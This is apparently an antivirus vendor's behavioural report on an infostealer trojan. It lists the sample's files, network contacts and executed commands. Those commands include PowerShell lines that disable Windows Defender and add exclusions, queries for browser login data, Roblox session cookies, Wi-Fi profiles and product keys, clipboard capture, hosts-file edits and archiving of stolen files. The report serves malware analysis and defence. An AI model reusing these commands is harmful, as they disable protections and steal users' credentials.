Trojan.Siggen32.4921

Technical Information

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '<Full path to file>'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -Enabl...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%TEMP%\bound.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‎ ‌.scr'

Executes the following

'<SYSTEM32>\taskkill.exe' /F /PID 1548
'<SYSTEM32>\taskkill.exe' /F /PID 3744
'<SYSTEM32>\taskkill.exe' /F /PID 2448
'<SYSTEM32>\taskkill.exe' /F /PID 1900
'<SYSTEM32>\taskkill.exe' /F /PID 4160
'<SYSTEM32>\taskkill.exe' /F /PID 4472
'<SYSTEM32>\taskkill.exe' /F /PID 4844

Launches a large number of processes

Terminates or attempts to terminate

the following user processes:

iexplore.exe
firefox.exe

Reads files which store third party applications passwords

%HOMEPATH%\desktop\508softwareandos.doc
%HOMEPATH%\desktop\aoc_saq_d_v3_merchant.docx
%HOMEPATH%\desktop\february_catalogue__2015.doc
%HOMEPATH%\desktop\hadac_newsletter_july_2010_final.docx
%HOMEPATH%\desktop\lisp_success.doc
%LOCALAPPDATA%\microsoft\edge\user data\default\login data
%LOCALAPPDATA%\microsoft\edge\user data\default\web data

Modifies file system

Creates the following files

%TEMP%\_mei40042\vcruntime140.dll
%TEMP%\_mei40042\vcruntime140_1.dll
%TEMP%\_mei40042\_asyncio.pyd
%TEMP%\_mei40042\_bz2.pyd
%TEMP%\_mei40042\_ctypes.pyd
%TEMP%\_mei40042\_decimal.pyd
%TEMP%\_mei40042\_hashlib.pyd
%TEMP%\_mei40042\_lzma.pyd
%TEMP%\_mei40042\_multiprocessing.pyd
%TEMP%\_mei40042\_overlapped.pyd
%TEMP%\_mei40042\_queue.pyd
%TEMP%\_mei40042\_socket.pyd
%TEMP%\_mei40042\_sqlite3.pyd
%TEMP%\_mei40042\_ssl.pyd
%TEMP%\_mei40042\_wmi.pyd
%TEMP%\_mei40042\_zstd.pyd
%TEMP%\_mei40042\api-ms-win-core-console-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-datetime-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-debug-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-errorhandling-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-fibers-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-file-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-file-l1-2-0.dll
%TEMP%\_mei40042\api-ms-win-core-file-l2-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-handle-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-heap-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-interlocked-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-libraryloader-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-localization-l1-2-0.dll
%TEMP%\_mei40042\api-ms-win-core-memory-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-namedpipe-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-processenvironment-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-processthreads-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-processthreads-l1-1-1.dll
%TEMP%\_mei40042\api-ms-win-core-profile-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-rtlsupport-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-string-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-synch-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-synch-l1-2-0.dll
%TEMP%\_mei40042\api-ms-win-core-sysinfo-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-timezone-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-core-util-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-conio-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-convert-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-environment-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-filesystem-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-heap-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-locale-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-math-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-process-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-runtime-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-stdio-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-string-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-time-l1-1-0.dll
%TEMP%\_mei40042\api-ms-win-crt-utility-l1-1-0.dll
%TEMP%\_mei40042\base_library.zip
%TEMP%\_mei40042\blank.aes
%TEMP%\_mei40042\bound.blank
%TEMP%\_mei40042\libcrypto-3.dll
%TEMP%\_mei40042\libffi-8.dll
%TEMP%\_mei40042\libssl-3.dll
%TEMP%\_mei40042\pyexpat.pyd
%TEMP%\_mei40042\python314.dll
%TEMP%\_mei40042\rar.exe
%TEMP%\_mei40042\rarreg.key
%TEMP%\_mei40042\select.pyd
%TEMP%\_mei40042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
%TEMP%\_mei40042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
%TEMP%\_mei40042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
%TEMP%\_mei40042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
%TEMP%\_mei40042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
%TEMP%\_mei40042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
%TEMP%\_mei40042\setuptools\_vendor\jaraco\text\lorem ipsum.txt
%TEMP%\_mei40042\sqlite3.dll
%TEMP%\_mei40042\ucrtbase.dll
%TEMP%\_mei40042\unicodedata.pyd
%TEMP%\bound.exe
%ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\ ‍‎ ‌.scr
%TEMP%\ ‌ ‎ \common files\desktop\508softwareandos.doc
%TEMP%\ ‌ ‎ \common files\desktop\aoc_saq_d_v3_merchant.docx
%TEMP%\ ‌ ‎ \common files\desktop\february_catalogue__2015.doc
%TEMP%\ ‌ ‎ \common files\desktop\hadac_newsletter_july_2010_final.docx
%TEMP%\ ‌ ‎ \common files\desktop\lisp_success.doc
%TEMP%\ ‌ ‎ \system\antivirus.txt
%TEMP%\krgvzwdt\krgvzwdt.0.cs
%TEMP%\krgvzwdt\krgvzwdt.cmdline
%TEMP%\krgvzwdt\krgvzwdt.out
%TEMP%\ ‌ ‎ \directories\desktop.txt
%TEMP%\ ‌ ‎ \directories\pictures.txt
%TEMP%\ ‌ ‎ \directories\documents.txt
%TEMP%\ ‌ ‎ \directories\music.txt
%TEMP%\ ‌ ‎ \directories\videos.txt
%TEMP%\ ‌ ‎ \directories\downloads.txt
%TEMP%\krgvzwdt\csc96239ce31bc42b5a21cdd1e9ef94dae.tmp
%TEMP%\res1ffd.tmp
%TEMP%\krgvzwdt\krgvzwdt.dll
%TEMP%\ ‌ ‎ \display (1).png
%TEMP%\d5jysozlsl.tmp
%TEMP%\5blkrvapya.tmp
%TEMP%\1warxuoz25.tmp
%TEMP%\ ‌ ‎ \system\task list.txt
%TEMP%\ ‌ ‎ \system\system info.txt
%TEMP%\ ‌ ‎ \system\mac addresses.txt
%TEMP%\cq0tv.zip

Sets the 'hidden' attribute to the following files

<Full path to file>

Deletes following files that it created itself

%TEMP%\res1ffd.tmp
%TEMP%\krgvzwdt\csc96239ce31bc42b5a21cdd1e9ef94dae.tmp
%TEMP%\krgvzwdt\krgvzwdt.out
%TEMP%\krgvzwdt\krgvzwdt.dll
%TEMP%\krgvzwdt\krgvzwdt.cmdline
%TEMP%\krgvzwdt\krgvzwdt.0.cs
%TEMP%\d5jysozlsl.tmp
%TEMP%\5blkrvapya.tmp
%TEMP%\1warxuoz25.tmp

Modifies the HOSTS file.

Network activity

Connects to

'ip##pi.com':80
'gs##tic.com':443
'ca####.discord.com':443

TCP

HTTP GET requests

http://ip##pi.com/json/?fi###########

Other

'gs##tic.com':443
'ca####.discord.com':443

UDP

DNS ASK bl###-r6in8.in
DNS ASK ip##pi.com
DNS ASK gs##tic.com
DNS ASK ca####.discord.com

Miscellaneous

Searches for the following windows

ClassName: '' WindowName: ''

Creates and executes the following

'%TEMP%\bound.exe'
'%TEMP%\_mei40042\rar.exe' a -r -hp"123" "%TEMP%\cq0TV.zip" *

Restarts the analyzed sample

Executes the following

'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '<Full path to file>'"
'<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ...
'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%TEMP%\bound.exe'"
'<SYSTEM32>\cmd.exe' /c "start bound.exe"
'<SYSTEM32>\cmd.exe' /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Execute como admininstrador!', 0, 'ERROR', 0+16);close()""
'<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST"
'<SYSTEM32>\cmd.exe' /c "wmic csproduct get uuid"
'<SYSTEM32>\tasklist.exe' /FO LIST
'<SYSTEM32>\wbem\wmic.exe' csproduct get uuid
'<SYSTEM32>\mshta.exe' "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Execute como admininstrador!', 0, 'ERROR', 0+16);close()"
'<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
'<SYSTEM32>\reg.exe' QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
'<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
'<SYSTEM32>\reg.exe' QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
'<SYSTEM32>\cmd.exe' /c "wmic path win32_VideoController get name"
'<SYSTEM32>\wbem\wmic.exe' path win32_VideoController get name
'<SYSTEM32>\cmd.exe' /c "attrib +h +s "<Full path to file>""
'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‎ ‌.scr'"
'<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value"
'<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard"
'<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
'<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value"
'<SYSTEM32>\cmd.exe' /c "tree /A /F"
'<SYSTEM32>\cmd.exe' /c "netsh wlan show profile"
'<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
'<SYSTEM32>\cmd.exe' /c "systeminfo"
'<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB...
'<SYSTEM32>\attrib.exe' +h +s "<Full path to file>"
'<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value
'<SYSTEM32>\wbem\wmic.exe' /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
'<SYSTEM32>\tree.com' /A /F
'<SYSTEM32>\systeminfo.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-Clipboard
'<SYSTEM32>\netsh.exe' wlan show profile
'<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value
'<SYSTEM32>\reg.exe' QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC...
'<SYSTEM32>\cmd.exe' /c "attrib -r <DRIVERS>\etc\hosts"
'<SYSTEM32>\attrib.exe' -r <DRIVERS>\etc\hosts
'<SYSTEM32>\cmd.exe' /c "attrib +r <DRIVERS>\etc\hosts"
'<SYSTEM32>\attrib.exe' +r <DRIVERS>\etc\hosts
'%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\krgvzwdt\krgvzwdt.cmdline"
'%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1FFD.tmp" "%TEMP%\krgvzwdt\CSC96239CE31BC42B5A21CDD1E9EF94DAE.TMP"
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 1548"
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 3744"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
'<SYSTEM32>\cmd.exe' /c "getmac"
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 2448"
'<SYSTEM32>\getmac.exe'
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 1900"
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4160"
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4472"
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4844"
'<SYSTEM32>\cmd.exe' /c "%TEMP%\_MEI40042\rar.exe a -r -hp"123" "%TEMP%\cq0TV.zip" *"
'<SYSTEM32>\cmd.exe' /c "wmic os get Caption"
'<SYSTEM32>\wbem\wmic.exe' os get Caption
'<SYSTEM32>\cmd.exe' /c "wmic computersystem get totalphysicalmemory"
'<SYSTEM32>\wbem\wmic.exe' computersystem get totalphysicalmemory
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '<Full path to file>'"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ...' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%TEMP%\bound.exe'"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "start bound.exe"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Execute como admininstrador!', 0, 'ERROR', 0+16);close()""' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic csproduct get uuid"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic path win32_VideoController get name"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "attrib +h +s "<Full path to file>""' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‎ ‌.scr'"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "tree /A /F"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "netsh wlan show profile"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "systeminfo"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB...' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "attrib -r <DRIVERS>\etc\hosts"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "attrib +r <DRIVERS>\etc\hosts"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\krgvzwdt\krgvzwdt.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1FFD.tmp" "%TEMP%\krgvzwdt\CSC96239CE31BC42B5A21CDD1E9EF94DAE.TMP"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 1548"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 3744"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "getmac"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 2448"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 1900"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4160"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4472"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4844"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "%TEMP%\_MEI40042\rar.exe a -r -hp"123" "%TEMP%\cq0TV.zip" *"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic os get Caption"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic computersystem get totalphysicalmemory"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"' (with hidden window)

Technologies

Begriffe

Schulung und Training

Mythen

Technical Information

Curing recommendations

Free trial